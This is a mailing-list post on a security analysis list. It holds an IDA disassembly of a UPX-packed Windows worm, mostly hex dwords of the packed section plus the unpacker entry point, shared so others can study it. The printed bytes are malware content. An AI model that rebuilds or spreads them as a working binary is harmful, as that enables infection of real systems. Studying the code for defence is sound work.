[Dshield] Worm Disassembly

Chris Ream chrisr at stopthemcold.com
Wed Aug 13 19:22:57 GMT 2003


Ok, I've been getting slammed with requests so here is the disassembly
of one of the worms. I'll post the other one shortly and send my
comments privately to those interested in discussing it.

For those examining it don't forget that windows programs written in c
don't actually start executing code at void main() they do several
things like loading environment variables and argc's before they jump to
the actual code.

-Chris.
chrisr at stopthemcold.com

here it is...

UPX0:00401000 ; Format      : Portable executable for IBM PC (PE)
UPX0:00401000 ; Section 1. (virtual address 00001000)
UPX0:00401000 ; Virtual size                  : 00005000 (  20480.)
UPX0:00401000 ; Section size in file          : 00000000 (      0.)
UPX0:00401000 ; Offset to raw data for section: 00000200
UPX0:00401000 ; Flags E0000080: Bss Executable Readable Writable
UPX0:00401000 ; Alignment     : 16 bytes ?
UPX0:00401000 
UPX0:00401000                 model flat
UPX0:00401000 
UPX0:00401000 ;
------------------------------------------------------------------------
---
UPX0:00401000 
UPX0:00401000 ; Segment type: Pure code
UPX0:00401000 ; Segment permissions: Read/Write/Execute
UPX0:00401000 UPX0            segment para public 'CODE' use32
UPX0:00401000                 assume cs:UPX0
UPX0:00401000                 ;org 401000h
UPX0:00401000                 assume es:nothing, ss:nothing, ds:nothing,
fs:nothing, gs:nothing
UPX0:00401000                 dd 72h dup(?)
UPX0:004011C8                 db 3 dup(?)
UPX0:004011CB dword_4011CB    dd 138Dh dup(?)         ; CODE XREF:
start+14Fj
UPX0:00405FFF                 db ?
UPX0:00405FFF UPX0            ends
UPX0:00405FFF 
UPX1:00406000 ; Section 2. (virtual address 00006000)
UPX1:00406000 ; Virtual size                  : 00002000 (   8192.)
UPX1:00406000 ; Section size in file          : 00001400 (   5120.)
UPX1:00406000 ; Offset to raw data for section: 00000200
UPX1:00406000 ; Flags E0000040: Data Executable Readable Writable
UPX1:00406000 ; Alignment     : 16 bytes ?
UPX1:00406000 ;
------------------------------------------------------------------------
---
UPX1:00406000 
UPX1:00406000 ; Segment type: Pure code
UPX1:00406000 ; Segment permissions: Read/Write/Execute
UPX1:00406000 UPX1            segment para public 'CODE' use32
UPX1:00406000                 assume cs:UPX1
UPX1:00406000                 ;org 406000h
UPX1:00406000                 assume es:nothing, ss:nothing, ds:nothing,
fs:nothing, gs:nothing
UPX1:00406000                 dd 0D3EE825Fh, 543074h, 11D100h, 2C2000h,
12600h
UPX1:00406014                 db 3Dh
UPX1:00406015 dword_406015    dd 0FFF2FFFEh, 8B40C031h, 0F704244Ch,
60441h, 448B0F74h
UPX1:00406015                                         ; DATA XREF:
start+1o
UPX1:00406015                 dd 548B0824h, 2891024h, 0FFB903B8h,
0C310EF77h, 12575653h
UPX1:00406015                 dd 0FE6A5010h, 40100068h, 35FF6400h,
0DDDBFF15h, 258906B9h
UPX1:00406015                 dd 588B2019h, 830C702Fh, 2074FFFEh,
0D97F743Bh, 2424FFDCh
UPX1:00406015                 dd 348D1A74h, 0B30C8B76h, 7C481754h,
750004B3h, 0BFFF77D7h
UPX1:00406015                 dd 0B354FFFFh, 64D1EB08h, 8335058Fh,
5E5F0CC4h
UPX1:00406089 ;
------------------------------------------------------------------------
---
UPX1:00406089                 pop     ebx
UPX1:0040608A                 retn
UPX1:0040608B ;
------------------------------------------------------------------------
---
UPX1:0040608B                 push    ebp
UPX1:0040608C                 mov     ebp, esp
UPX1:0040608E                 pop     esp
UPX1:0040608F                 push    ebp
UPX1:00406090                 push    0
UPX1:00406092                 mov     esi, 16EEFFBh
UPX1:00406097                 push    75FF5A92h
UPX1:0040609C                 or      al, ch
UPX1:0040609E                 add     [eax], eax
UPX1:004060A0                 adc     eax, [eax+5Dh]
UPX1:004060A3                 sbb     al, 89h
UPX1:004060A5                 in      al, dx
UPX1:004060A6                 pop     ebp
UPX1:004060A7                 retn
UPX1:004060A7 ;
------------------------------------------------------------------------
---
UPX1:004060A8                 dd 0FFFB7BFCh, 0EC8320EEh, 5D8B2308h,
8458B0Ch, 254030A3h
UPX1:004060A8                 dd 5341D89h, 0B63F6B7Bh, 75AE40F7h,
0F8458972h, 0FC45AC19h
UPX1:004060A8                 dd 77FB16A3h, 0D8DEDFBh, 8BFC4389h,
87B2D73h, 0C8D6291h
UPX1:004060A8                 dd 0D6EE8176h, 748F65FEh, 8D55563Ah,
0B86106Bh, 5B4D5E5Dh
UPX1:004060A8                 dd 9FDD6B6h, 782874C0h, 72532531h,
1D047691h, 0AC65BBF7h
UPX1:004060A8                 dd 81C0C56h, 8F048B36h, 300C438Bh,
5CFF0BBFh, 340F2508h
UPX1:004060A8                 dd 2CACEB8Fh, 6A4771EBh, 0DBDD76FFh,
0BC0C2A61h, 7A1005C7h
UPX1:004060A8                 dd 0B6A8E0Bh, 0ECCDD873h, 5F181440h,
8192175h, 0C80EEFB7h
UPX1:004060A8                 dd 3BB80708h, 8327EB00h, 502AA1F8h,
0AF61B2Eh, 0D1E2450h
UPX1:004060A8                 dd 210FBA00h, 0F2894E6h, 1A2C3D83h,
0DEDECF00h, 0A1E83EC3h
UPX1:004060A8                 dd 0E0FF720Eh, 64D71058h, 870CDDA1h,
9E355DA1h, 551B1C68h
UPX1:004060A8                 dd 668410B3h, 49AA509Ah, 0FFB82310h,
0E865897Fh, 243CD950h
UPX1:004060A8                 dd 240C8166h, 2CD90300h, 287F6324h,
7DF67B5Eh, 2004242Eh
UPX1:004060A8                 dd 89A0137Eh, 17B6CF14h, 162405D9h,
121C1448h, 0F7F1D750h
UPX1:004060A8                 dd 3118376Fh, 0FC4D89C9h, 0C9B82A50h,
65A311C3h, 0DFC73787h
UPX1:004060A8                 dd 0EC817EC3h, 316C3AACh, 0EF916AF6h,
50BBB98Eh, 0F003F5Fh
UPX1:004060A8                 dd 485D6A66h, 265h, 0DF1D9E80h, 326A883Fh,
1C63C68h, 0F8484904h
UPX1:004060A8                 dd 7B07D9BEh, 687C0794h, 0D1D4843h,
1EC7E14Ch, 3D0404FEh
UPX1:004060A8                 dd 1207F9B7h, 858DD412h, 0D86BE860h,
50FF76B9h, 11105251h
UPX1:004060A8                 dd 142FDAFCh, 0F25C82Dh, 4C1A0101h,
618DEDF7h, 0FFC82211h
UPX1:004060A8                 dd 6C050BE9h, 0B1270468h, 0F936E637h,
10676930h, 63C6DBB7h
UPX1:004060A8                 dd 4412C35Bh, 4E1A0CAFh, 0EB581347h,
3BFBFB91h, 312C25FBh
UPX1:004060A8                 dd 21340D40h, 5593014h, 95FEB90Ch,
0BFEE617Bh, 89F9F799h
UPX1:004060A8                 dd 3D8947D7h, 15154A14h, 0D33E3538h,
0A44192B9h, 0E484FC86h
UPX1:004060A8                 dd 3BD84FB9h, 0F0840F01h, 89CC1400h,
0D80B5C85h, 77AD993Eh
UPX1:004060A8                 dd 3943D619h, 7CA0B00h, 45FE36D9h,
92408B04h, 13542C30h
UPX1:004060A8                 dd 0FB615BE8h, 0BB5FFDEh, 40EE7837h,
9CBD492Bh, 573DFDECh
UPX1:004060A8                 dd 3E68247Dh, 48145A10h, 0B61F7BDEh,
0A3AC3958h, 0F4219128h
UPX1:004060A8                 dd 0C8F21585h, 0FC30101Ch, 0A573784Ah,
0BD3C8A3Ch, 81F7E14h
UPX1:004060A8                 dd 0E4F7DF0Fh, 23152914h, 0FA365A1h,
38DB0AA1h, 6A3527Ch
UPX1:004060A8                 dd 0F354617h, 837ED4B7h, 27D0CFAh,
28343920h, 21F673D6h
UPX1:004060A8                 dd 70A1D67h, 21B0A7Eh, 784AF253h,
3C75F609h, 1031287Ch
UPX1:004060A8                 dd 95BF0B0h, 36A9C8Fh, 0AD18F4E6h,
3C36B78Fh, 28099AE6h
UPX1:004060A8                 dd 2C94BC54h, 0F018F8DFh, 0F61F2F3Ah,
5903236Fh, 0F7F0FFCh
UPX1:004060A8                 dd 57F07D8Dh, 167E080Eh, 1EC766FBh,
1EC12F34h, 4701B38h
UPX1:004060A8                 dd 0BDF5A97Ah, 0F9EB7307h, 0CC40083Fh,
0C910C2C9h, 254EE4CDh
UPX1:004060A8                 dd 0EB93552Ch, 0FC384038h, 232BAD0h,
0A3C0CC01h, 0F8416024h
UPX1:004060A8                 dd 451EFBA3h, 85916A19h, 7F81FDD8h,
0F4AED8DBh, 0FC76677h
UPX1:004060A8                 dd 30451B02h, 9AC28954h, 66F77739h,
11DA9589h, 5DCA583h
UPX1:004060A8                 dd 3B333032h, 4A5FE7BEh, 8553D823h,
46D93AF6h, 10F866BAh
UPX1:004060A8                 dd 6508D09h, 18EC26E8h, 0A104B9DDh,
8438FBD4h, 0DF77A74Eh
UPX1:004060A8                 dd 8C0F0188h, 0DB312FBCh, 2BBF3768h,
0FAEC7CD0h, 89B2D089h
UPX1:004060A8                 dd 439EABC6h, 0ACB9BB96h, 89FC8B37h,
838A25D8h, 0B2E6A74Ch
UPX1:004060A8                 dd 756FE15h, 832817D4h, 0FE00D1DCh,
83C7C4DCh, 0C6BD936Ch
UPX1:004060A8                 dd 90CF04C7h, 0FCC4578Fh, 85DDF483h,
227C8BA8h, 91038468h
UPX1:004060A8                 dd 0BF1BA681h, 73B2FFBFh, 0C40D560Bh,
5EB3A59h, 0EC163AD3h
UPX1:004060A8                 dd 1B4806C6h, 11130E74h, 0BACE8805h,
38B95CCCh, 42F04A40h
UPX1:004060A8                 dd 142E9CE0h, 955B941Eh, 0DB3D818Dh,
7E9DF9B6h, 0E70F7E22h
UPX1:004060A8                 dd 0EB30052Dh, 872C0708h, 472CCF6Ch,
303B3022h, 98F6E419h
UPX1:004060A8                 dd 3010185Eh, 23DB2122h, 8A301072h,
18E42831h, 2807CB3Fh
UPX1:004060A8                 dd 0C396EBh, 0C610018Ch, 9045F08Ah,
0E19476FDh, 16B7704Eh
UPX1:004060A8                 dd 8768DA0Ch, 0F8C63F1Ah, 755F1D20h,
25FF3196h, 0BD448901h
UPX1:004060A8                 dd 0A3A61BB0h, 2603DF35h, 0FF90B458h,
7E2F835Ah, 57800466h
UPX1:004060A8                 dd 47603313h, 0D9DBFF83h, 7C14E51Eh,
35C383CEh, 630F3005h
UPX1:004060A8                 dd 3010239Dh, 0D22B04h, 4820EB0Fh,
0C181323h, 35ED6C11h
UPX1:004060A8                 dd 0AC5912C6h, 0B8AF985h, 6DAF60E4h,
0A4A6980Eh, 0DB141261h
UPX1:004060A8                 dd 0A07C20B7h, 8F070868h, 0A465836Bh,
0FBA80300h, 0A52E19D3h
UPX1:004060A8                 dd 7406DE78h, 0B58B19EBh, 0FBBD8D08h,
385C8BF6h, 7CB59C39h
UPX1:004060A8                 dd 0FF14740Ah, 0DB851285h, 28F63B03h,
0D9720B39h, 7C1C750Dh
UPX1:004060A8                 dd 72762D40h, 391773D9h, 8723FF89h,
0D3BD223Eh, 0B1750A4h
UPX1:004060A8                 dd 0B1901F77h, 7D6C21F0h, 0EBF0000Bh,
0C98C4539h, 0E98B475Ch
UPX1:004060A8                 dd 3B7CE606h, 4D838BBh, 805F20B6h,
25091139h, 0E64BC6DCh
UPX1:004060A8                 dd 0F5D93ACEh, 59C3312Eh, 0B11E3C3Fh,
72934B8h, 5E13B5B4h
UPX1:004060A8                 dd 0F0D73733h, 760653EAh, 178712ACh,
0BDA975C1h, 41A96EDBh
UPX1:004060A8                 dd 1CEC6838h, 0EB0B139Dh, 93EDCDC7h,
18759F0Ah, 8DA4BD32h
UPX1:004060A8                 dd 348EC035h, 0B96EDB9Fh, 0A5F39B12h,
8E74412h, 3483D841h
UPX1:004060A8                 dd 0EDE8839Fh, 8044468h, 9E79073Ch,
0F40F78E7h, 7CD2B4EAh
UPX1:004060A8                 dd 0D8B3F20Eh, 0C4780E6h, 20D6CE0Dh,
3AECA638h, 0C86DBA35h
UPX1:004060A8                 dd 0D090EB18h, 2562CC27h, 0F52E77BBh,
21820360h, 0F8EBF000h
UPX1:004060A8                 dd 0EFFCE57Eh, 8C85811Ch, 0EF8B6366h,
5D7C8AF7h, 890A0509h
UPX1:004060A8                 dd 60721C68h, 539B06Fh, 0E703E2Eh,
56AD917Bh, 7026AACCh
UPX1:004060A8                 dd 4874D6E4h, 3C01063Ch, 2EE70823h,
3CBC85CFh, 0D8307806h
UPX1:004060A8                 dd 9242D9E6h, 48BB784Bh, 0CD9DED26h,
0A606A8EFh, 2C0F008h
UPX1:004060A8                 dd 64B9100Ah, 101092E4h, 464B8080h,
8484192Eh, 92E464B4h
UPX1:004060A8                 dd 0B8B8B491h, 1C92F1D0h, 0F18CD0B9h,
0CE30690Ah, 0F84896D6h
UPX1:004060A8                 dd 4F9C1DA4h, 17B56BDEh, 0AFED1B21h,
0E660EBC9h, 10A01FC8h
UPX1:004060A8                 dd 21E68F0h, 5CD22903h, 721EB9FAh,
21EDCA0Ch, 0EDC80274h
UPX1:004060A8                 dd 42DEBB21h, 115C420Fh, 0CBB9B7CBh,
14CABDC7h, 6C450C5Ah
UPX1:004060A8                 dd 0CD6216C4h, 0E8B2E21h, 5E91CCD7h,
0A44F4D9Bh, 0ACDEEC69h
UPX1:004060A8                 dd 56E6320h, 0B3926C24h, 0D44F0DC9h,
5FD886E6h, 0AB42C9D8h
UPX1:004060A8                 dd 2C49D8D4h, 641B60Fh, 0DF85DEE9h,
0DDDE0712h, 9F590D28h
UPX1:004060A8                 dd 931F68DCh, 2025430h, 0C9B71D4Bh,
8E40C00Bh, 0CC5ED9C4h
UPX1:004060A8                 dd 3D157673h, 0C25B3B1Ah, 615884C0h,
9E84726Fh, 100C684Bh
UPX1:004060A8                 dd 4657EDFCh, 0E56DE8EFh, 400A0E8Dh,
57013C80h, 0CAE92C4Fh
UPX1:004060A8                 dd 0FCAEF9h, 0F587F59Ch, 3E86824h,
0BEBDBE8h, 9646D068h
UPX1:004060A8                 dd 43F687FAh, 7D0AFB83h, 0E738A209h,
0CECA6408h, 0C6D0272h
UPX1:004060A8                 dd 0F65B3C90h, 4C5B527Ch, 787647FEh,
83475B2Fh, 1D4114BDh
UPX1:004060A8                 dd 4D838F0Eh, 1F74B1F0h, 4482338Ch,
6429F840h, 5C083562h
UPX1:004060A8                 dd 0C03BD936h, 0F8162825h, 53C0A017h,
244CE896h, 0EBD2310Ch
UPX1:004060A8                 dd 0EB7FFE0Dh, 0C383EF97h, 0EEB70F02h,
2E983C2h, 7F01F983h
UPX1:004060A8                 dd 74C909EEh, 0DF12F105h, 1003D316h,
0E9C1D189h, 0E381D3E2h
UPX1:004060A8                 dd 7FB1FC58h, 1CA8910h, 0CA0110DAh,
0D0F7D089h, 0F028D924h
UPX1:004060A8                 dd 99561080h, 963ACD08h, 83CAC738h,
0F8101AA7h, 164D435Dh
UPX1:004060A8                 dd 0EC05EEC6h, 468B09EBh, 0E2478B0Ch,
38ABDEDBh, 5D81F889h
UPX1:004060A8                 dd 0FC445135h, 0CFDA9801h, 47EC9F0Fh,
59870E40h, 0C8DB2C30h
UPX1:004060A8                 dd 5C197B92h, 34120337h, 805819C7h,
475C41Dh, 0C31534C9h
UPX1:004060A8                 dd 0B00F173Eh, 0B4616602h, 0ECDA9318h,
56571BE0h, 6A320F0Ch
UPX1:004060A8                 dd 2448F614h, 21EDB18Bh, 2EBE29F0h,
9CE451B0h, 929C0400h
UPX1:004060A8                 dd 7AB47B0h, 7E77494Dh, 236E2366h,
947C0346h, 7DED1768h
UPX1:004060A8                 dd 0FF874672h, 13BD8B52h, 89645AC9h,
389E1064h, 0D4D90C33h
UPX1:004060A8                 dd 6ED09824h, 77E2E9FFh, 0FF6EFF2Eh,
20C389DFh, 0B3493880h
UPX1:004060A8                 dd 0E06E6E42h, 0ECBB827Dh, 8A8965Fh,
0EC45C684h, 16286A45h
UPX1:004060A8                 dd 0ADDB2FEEh
UPX1:004068A8                 dd 0DF0AD75h, 1C6AF205h, 0F50380F4h,
0B91CC6CAh, 30110D06h
UPX1:004068A8                 dd 0B2E949FCh, 0C7DAE25Bh, 50E42AE0h,
954102E5h, 74732EEh
UPX1:004068A8                 dd 0EA3AE61Bh, 0D3CB6DD8h, 94FCE840h,
992D9825h, 1FA93C06h
UPX1:004068A8                 dd 9A263576h, 0A3F85D89h, 0F6503E8h,
0C78183BFh, 0F5E7810Ah
UPX1:004068A8                 dd 86152957h, 24D8C20Ch, 6CDB1B64h,
0C10AFF61h, 0C70910E7h
UPX1:004068A8                 dd 0DC5B0D2Ch, 2F17B60Ch, 0F50C6A90h,
1B049C03h, 7ADAD9A4h
UPX1:004068A8                 dd 20A8D80Eh, 62C6CA19h, 633C0E07h,
4C2EEC1Fh, 0B0E41A1Eh
UPX1:004068A8                 dd 11C48204h, 3B2B0B92h, 7B10F63Bh,
781EB43Dh, 2A7E800Bh
UPX1:004068A8                 dd 20D23E17h, 0FF17A854h, 2F51C825h,
90199090h, 0B1504CDh
UPX1:004068A8                 dd 1901D0CCh, 0D8D40190h, 90190190h,
19E4E0DCh, 0E8190190h
UPX1:004068A8                 dd 1901F0ECh, 0F8F40190h, 901C9720h,
45200FCh, 32032032h
UPX1:004068A8                 dd 4A100C08h, 14032032h, 0F97F8D20h,
12AB9270h, 223F80ECh
UPX1:004068A8                 dd 226A2375h, 6AF826E1h, 3C0940A4h,
727D4530h, 29B7DBFFh
UPX1:004068A8                 dd 1EB471Bh, 74201F47h, 471CEBFAh,
1407BE0Fh, 5F732F02h
UPX1:004068A8                 dd 7520F8DFh, 740E16F3h, 0BF85D3F3h,
0CD1C74B6h, 2440957h
UPX1:004068A8                 dd 0BF5F5F4Ch, 59A5CB7Fh, 2D10007Fh,
24048504h, 0EB73073Dh
UPX1:004068A8                 dd 0DDB1901Bh, 0FF0BC429h, 302C9BE1h,
9019010Bh, 90383401h
UPX1:004068A8                 dd 3C901901h, 90194440h, 4C481901h,
90190150h, 90585401h
UPX1:004068A8                 dd 5C901901h, 90196C60h, 74701901h,
90190180h, 90888401h
UPX1:004068A8                 dd 8C901901h, 90199490h, 9C981901h,
901901A0h, 90A8A401h
UPX1:004068A8                 dd 0AC901901h, 445B4B0h, 0B81936h,
408B00A8h, 0FCB215F9h
UPX1:004068A8                 dd 4030A9h, 8040313Ch, 7FFFEDF6h,
6C62736Dh, 2E747361h
UPX1:004068A8                 dd 657865h, 756A2049h, 6177200Ah,
0FFED046Eh, 6F74FFFFh
UPX1:004068A8                 dd 79617320h, 564F4C20h, 4F592045h,
41532055h, 21214Eh
UPX1:004068A8                 dd 6C6C6962h, 6DB7FD14h, 746167FBh,
68267365h, 79256409h
UPX1:004068A8                 dd 6D20756Fh, 0DA656B61h, 31BB7ED6h,
70146968h, 6973736Fh
UPX1:004068A8                 dd 313F0D51h, 0DBFB7B5Bh, 69197042h,
6F06676Eh, 572D656Eh
UPX1:004068A8                 dd 0DBDBBB64h, 696620F7h, 5D723278h,
6974666Fh, 5556572h
UPX1:004068A8                 dd 9A6F3D00h, 10030BEEh, 0D07F489Bh,
116D016h, 0EED9D9CFh
UPX1:004068A8                 dd 1A00103h, 4606C0ABh, 0FE2AE604h,
8A885DFFh, 11C91CEBh
UPX1:004068A8                 dd 8E89Fh, 6048102Bh, 9EFB474Bh,
0E800C8E5h, 3F03E503h
UPX1:004068A8                 dd 0FFFF1704h, 4B06AC5Fh, 58243200h,
6445CCFDh, 0DD70B049h
UPX1:004068A8                 dd 962C74AEh, 3EE960D2h, 0D5ED937h,
470B701Bh, 9B00137Ch
UPX1:004068A8                 dd 10A6FFFFh, 0F1F19680h, 11CE4D2Ah,
20006AA6h, 0F4726EAFh
UPX1:004068A8                 dd 11414D0Ch, 52D87EFFh, 0F00D3342h,
0A807BAADh, 0B2000BF4h
UPX1:004068A8                 dd 36339BE6h, 4F451F03h, 0B7A20457h,
1D95DD60h, 30C70338h
UPX1:004068A8                 dd 0F8172813h, 1EDBB66h, 0CCCB10h,
174300C8h, 9A401FD8h
UPX1:004068A8                 dd 702BF41h, 0CD28C4h, 0EC5F6436h,
0BCD2964h, 0AB73B91Fh
UPX1:004068A8                 dd 2432430Fh, 0A4A6A543h, 24324324h,
69A6AAADh, 60732FBAh
UPX1:004068A8                 dd 40905803h, 9AF7B019h, 0D3DB7820h,
20550D7h, 0B64FBEE9h
UPX1:004068A8                 dd 0FF2088h, 8FC8400h, 3485F87h, 9060066h,
1B07BC02h, 72B10D8h
UPX1:004068A8                 dd 0B30C1978h, 64FFFDDCh, 98D8701Bh,
0D24F9893h, 0BE3DA911h
UPX1:004068A8                 dd 3257B257h, 6C273100h, 0E7809309h,
12431800h, 0F14073DEh
UPX1:004068A8                 dd 31F703FFh, 0C0E48640h, 0FFFF613Bh,
0C581DB83h, 0E800317h
UPX1:004068A8                 dd 99994AE9h, 6F508AF1h, 0E302857Ah,
1B01846Ch, 6E5F30E7h
UPX1:004068A8                 dd 27B26C23h, 0DDAD879h, 0B0C2F20h,
97630703h, 0E94606C5h
UPX1:004068A8                 dd 2E7F103Fh, 8533617h, 0E6847h,
1B8B68A3h, 0B8F65B0h
UPX1:004068A8                 dd 5C075F77h, 0E86FEE01h, 2400431Eh,
332D3105h, 35003400h
UPX1:004068A8                 dd 0C10B3600h, 1641B7Eh, 6F006473h,
31936300h, 4EEF652Ch
UPX1:004068A8                 dd 0B074200h, 0FB080B03h, 0E0CC27FEh,
90037FFDh, 77FDDF00h
UPX1:004068A8                 dd 5E19EBFFh, 0E981C931h, 3681B989h,
9432BF80h, 0BFCEE81h
UPX1:004068A8                 dd 5EBF2E2h, 0FDBFFEE8h, 308E2BBh,
741F0653h, 1A957557h
UPX1:004068A8                 dd 897F92BBh, 0B1CE1A5Ah, 0BEE17CDEh,
0DFFFB7F6h, 3AF90926h
UPX1:004068A8                 dd 9FD7B66Bh, 0DA71854Dh, 1D3681C6h,
0F85AB3C6h, 0DDF907ECh
UPX1:004068A8                 dd 0B3FCFFFFh, 0E8F01C8Dh, 0DFA641C8h,
88C2CDEBh, 33907436h
UPX1:004068A8                 dd 240C7EE6h, 23FFAD7Ch, 4C2219BFh,
0DACC624Ch, 0E2CDAB8Ah
UPX1:004068A8                 dd 79F9D784h, 0FCF3847Ch, 9ADAD8CFh,
9DEBA70Fh, 6ADA1275h
UPX1:004068A8                 dd 47E4A380h, 8E96FE46h, 7ADA78F0h,
56AE399Fh, 8CFF4ADAh
UPX1:004068A8                 dd 0D79B67FCh, 0DAF606DDh, 0EDD5975Ah,
0DFDAC646h, 2A91FDDDh
UPX1:004068A8                 dd 16B0193h, 66BBA253h, 7FB381FCh,
0D0C42AE9h, 0FFFFFFF9h
UPX1:004068A8                 dd 0D0D462EFh, 0D66B62FFh, 0D74CB9A3h,
80965AE8h, 4C1F6EAEh
UPX1:004068A8                 dd 0D3C524D5h, 0D7B46440h, 0BFFFFFECh,
63E8A47Dh, 1F1A27C7h
UPX1:004068A8                 dd 0EC57D750h, 0F75ABFE5h, 1D1CDBEDh,
78B18FE6h, 740E32D4h
UPX1:004068A8                 dd 0B0FFFFFFh, 5D017FB3h, 3F277E03h,
0D0F44262h, 6A76AFA4h
UPX1:004068A8                 dd 1D0F9BC4h, 37A9BD4h, 0FE5E5D7Eh,
0C41962DFh, 0D0C0229Bh
UPX1:004068A8                 dd 0EAC563EEh, 2C97FBEh, 0DB7F22E9h,
0CD5BDCBEh, 0B98B16Bh
UPX1:004068A8                 dd 93736577h, 64EA945Fh, 158F21F0h,
8B6FF6FEh, 0ECF23A80h
UPX1:004068A8                 dd 1772348Ch, 0B392ECFh, 0FF263AD7h,
0BBFFFFFh, 8A170BA0h
UPX1:004068A8                 dd 0B9BF8094h, 0F0E2DE51h, 67EC8090h,
5E34D7C2h, 773498B0h
UPX1:004068A8                 dd 37EB0BA8h, 0FF85DBECh, 0B96A83F2h,
83B468DEh, 0C9A6D162h
UPX1:004068A8                 dd 4A839334h, 0F6CB7CDBh, 0F28CFFFFh,
467BBA38h, 3F704193h
UPX1:004068A8                 dd 0C0547897h, 269BFCAFh, 0B02361E1h,
0FFFEEE54h, 0F48C1FFFh
UPX1:004068A8                 dd 0BC9CCEB9h, 34841FEFh, 0BD6B5131h,
6A0B5401h, 0E4DDCA6Dh
UPX1:004068A8                 dd 4A22F57h, 9264691Fh, 0B72D2057h,
0C2A88h, 907B1AC0h
UPX1:004068A8                 dd 0C8C2802h, 0BFEB0707h, 77018944h,
7377744Eh, 0A2647075h
UPX1:004068A8                 dd 84137FC4h, 6D6F632Eh, 0A732500h,
0E251B500h, 0B349512Bh
UPX1:004068A8                 dd 0D8557409h, 752EEF63h, 200B692Dh,
12544547h, 22E6425h
UPX1:004068A8                 dd 7E43EB53h, 2E692500h, 0B1627200h,
9636C38Fh, 7C412E5Ch
UPX1:004068A8                 dd 5C594749h, 12C4CCFFh, 62FE75A8h,
464F5300h, 13EC5754h
UPX1:004068A8                 dd 45F006FFh, 63694D5Ch, 5CB56F72h,
945B2657h, 435CF128h
UPX1:004068A8                 dd 562BBFC6h, 0C4A25EBDh, 0E0F37265h,
9275525Ch, 85054902h
UPX1:004068A8                 dd 2F595E00h, 0FF561422h, 5792565Ch,
56784AF2h, 17B65604h
UPX1:004068A8                 dd 55A8BC91h, 0C80352C0h, 69A69A6Ch,
0FCF0E4D8h, 34D35308h
UPX1:004068A8                 dd 1C10B34Dh, 4D48382Ch, 504D34D3h,
90807060h, 0DB2EC09Ch
UPX1:004068A8                 dd 53BCAC34h, 0A60BCC57h, 0E866BB33h,
54084FF8h, 0A69A3003h
UPX1:004068A8                 dd 58409A69h, 988C7C6Ch, 69A6D977h,
54C4B0A8h, 9D13D43Fh
UPX1:004068A8                 dd 0E44D203Bh, 4B550CF8h, 4D342403h,
382C34D3h, 0D3544840h
UPX1:004068A8                 dd 60D34D34h, 887C7068h, 4DB2AAB6h,
0FB559C90h, 41390203h
UPX1:004068A8                 dd 1B405015h, 5B2D91B2h, 99132800h,
39900B2h, 25CC3C47h
UPX1:004068A8                 dd 7203986Ch, 8111030Fh, 1608854h,
0C16C082h, 9B2FFF93h
UPX1:004068A8                 dd 1422CA8h, 74697845h, 636F7250h,
4B737365h, 54FDBFC0h
UPX1:004068A8                 dd 61657268h, 65470B64h, 6D6F4374h,
0DB4C806Dh, 69F6344Bh
UPX1:004068A8                 dd 1041656Eh, 6F46DD44h, 0DB741472h,
0F67016Eh, 7245064Ch
UPX1:004068A8                 dd 0F60D723Dh, 4D1FB6DEh, 6C75646Fh,
4E03691Fh, 13316D61h
UPX1:004068A8                 dd 4DD7FB05h, 116C4548h, 736F6C43h,
0B7B7E80Dh, 69541E8Fh
UPX1:004068A8                 dd 75656B63h, 520D746Eh, 6E556C74h,
0B9CE6EDBh, 6881254Dh
UPX1:004068A8                 dd 7803754Dh, 0DBB5AE33h, 652B53ADh,
65540670h, 0D9171D77h
UPX1:004068A8                 dd 0A061B366h, 0B5D00D25h, 0A7EC7B37h,
6765526Ch, 79654B65h
UPX1:004068A8                 dd 5BF7260Ch, 450DBEF7h, 7653104Ch,
756C6156h, 0F7DB0F65h
UPX1:004068A8                 dd 0C2363669h, 0AD5F5F80h, 33416161h,
72C3370Bh, 6F320967h
UPX1:004068A8                 dd 5650F69h, 77BBDCCDh, 74F6366h,
6E65706Fh, 0AEB57E06h
UPX1:004068A8                 dd 6DE1BEC5h, 7797063h, 3B72251Ch,
0ED7F6DDBh, 73C10624h
UPX1:004068A8                 dd 6CAA6769h
UPX1:004070A8                 dd 51727007h, 77307B58h, 17086674h,
0B0637274h, 0D9A7B507h
UPX1:004070A8                 dd 7E6B60B6h, 254920CDh, 0B6846DB7h,
75476EDFh, 0E63086Eh
UPX1:004070A8                 dd 66B65364h, 0B874B9B3h, 41C8D923h,
0DF6E3268h, 9AE850B6h
UPX1:004070A8                 dd 732AAC69h, 69756B04h, 75BB05BBh,
648E5F33h, 6F460A72h
UPX1:004070A8                 dd 576E8461h, 763F9B68h, 6568BDA6h,
0D7DE4B6Ch, 7E077BDEh
UPX1:004070A8                 dd 74072005h, 0B06DB740h, 4919CFD7h,
0E6680467h, 0EC166274h
UPX1:004070A8                 dd 0B879B6ECh, 6962C76Dh, 1F731214h,
2E066116h, 9F415357h
UPX1:004070A8                 dd 36B5F6C5h, 0B707576h, 0BE06643h,
0B98DBD63h, 2E3A6C42h
UPX1:004070A8                 dd 89673AD3h, 709B37B1h, 41453A0Ch,
0BFE43F2Ah, 4C45503Ch
UPX1:004070A8                 dd 2A000401h, 0E03F377Ch, 38010F00h,
0BFC05B2h, 370201h
UPX1:004070A8                 dd 0CB12CC16h, 3BECE011h, 21306021h,
0CB020B40h, 9F249B0Eh
UPX1:004070A8                 dd 0C603C04h, 733B2C4Fh, 710341Eh,
0E48A10A4h, 0C0502072h
UPX1:004070A8                 dd 0E821AF06h, 74DF2EB8h, 97901407h,
77B2C04h, 0D8603FB7h
UPX1:004070A8                 dd 2ED30067h, 0E8479B62h, 52C34B30h,
0C2801775h, 1E617C2Eh
UPX1:004070A8                 dd 64D8D85Ch, 1A07088Ch, 64D84027h,
2869F66Fh, 2724FBF3h
UPX1:004070A8                 dd 5CCF7C46h, 8C001B60h, 4Fh, 2400080h,
0FF00h, 2 dup(0)
UPX1:004071F0 
UPX1:004071F0 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
UPX1:004071F0 
UPX1:004071F0 
UPX1:004071F0                 public start
UPX1:004071F0 start           proc near
UPX1:004071F0                 pusha
UPX1:004071F1                 mov     esi, offset dword_406015
UPX1:004071F6                 lea     edi, [esi-5015h]
UPX1:004071FC                 push    edi
UPX1:004071FD                 or      ebp, 0FFFFFFFFh
UPX1:00407200                 jmp     short loc_407212
UPX1:00407200 ;
------------------------------------------------------------------------
---
UPX1:00407202                 align 8
UPX1:00407208 
